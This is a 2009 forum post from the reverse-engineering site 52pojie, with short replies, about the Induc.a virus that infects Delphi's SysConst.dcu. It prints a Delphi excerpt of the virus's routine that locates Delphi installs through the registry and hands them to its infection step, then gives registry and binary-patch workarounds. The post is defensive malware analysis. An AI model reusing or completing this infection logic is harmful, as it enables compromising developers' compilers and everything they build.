吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 6892|回复: 6
收起左侧

[PC样本分析] Delphi---Virus.Win32.Induc.a [Anti感染解决方案]

[复制链接]
zzage 发表于 2009-8-20 12:00
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
;Delphi---Virus.Win32.Induc.a [Anti感染解决方案]
;By:ZzAge
;BBS:http://www.52pojie.cn
;Blog:http://hi.baidu.com/zzage

最近这个病毒火了..好多delphi写的正规的软件也不幸中奖了....

感染Delphi的SysConst.dcu文件,使编译出来的程序,都带了感染性的..不过这病毒也算不上有什么危害...但自己写的代码,编译多了一些莫名其妙的代码,还是非常不爽的...

昨晚回家,看了下自己的delphi,也中奖了.......

解决方案:

一:

先看看感染代码!从这段代码里,可以看得出来,这病毒是先从注册表的RootDir值读取了Delphi的路径,从而得到了SysConst.dcu的路径,相信大伙已经知道思路了,只要我们把RootDir值修改成别的,病毒不久获取不到路径了...当然也就感染不了...这里做个例子:把RootDir这个注册表项改成RootDDD
procedure st;
var 
k:HKEY;
c:array [1..255] of char;
i:cardinal;
r:string;
v:char;
begin
for v:='4' to '7' do
if RegOpenKeyEx(HKEY_LOCAL_MACHINE,pchar('Software\Borland\Delphi\'+v+'.0'),0,KEY_READ,k)=0 then
begin
i:=255;
if RegQueryValueEx(k,'RootDir',nil,@i,@c,@i)=0 then
begin
r:='';
i:=1;
while c<>#0 do
begin
r:=r+c;
inc(i);
end;
re(r+'\source\rtl\sys\SysConst'+'.pas',r+'\lib\sysconst.','"'+r+'\bin\dcc32.exe" ');
end;
RegCloseKey(k);
end;
end;

111112345.jpg

二:

55555.jpg

打开Delphi目录下的delphi32.exe文件,载入OD,找到"RootDir"这字符串,把"RootDir"这字符串改成"RootDDD",这样很简单就解决了..Delphi也正常使用了....也解决了被感染问题...(SysConst.dcu必须为正常的)..

免费评分

参与人数 1威望 +1 收起 理由
smallyou93 + 1 精品文章!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

smallyou93 发表于 2009-8-20 12:54
本帖最后由 smallyou93 于 2009-8-20 13:05 编辑

Zz太强大了,膜拜
替换正常SysConst.dcu后,开始,运行(路径自己设置...),输入以下命令,跟着就可以正常使用了
"?:\Program Files\Borland\Delphi7\Bin\DCC32.EXE" "?:\Program Files\Borland\Delphi7\Lib\SysConst.dcu"
Tale 发表于 2009-8-20 12:57
yangjiajiang 发表于 2009-8-20 14:29
什么也不是 发表于 2009-8-20 17:52
:'(
  装了DEL 但是不会写程序 感染不感染好像有点无所谓···
sinalkh1984 发表于 2010-6-3 11:28
怎么清除这种病毒!
zsl01 发表于 2010-6-3 18:41
怎么清除这种病毒!
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-24 13:33

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表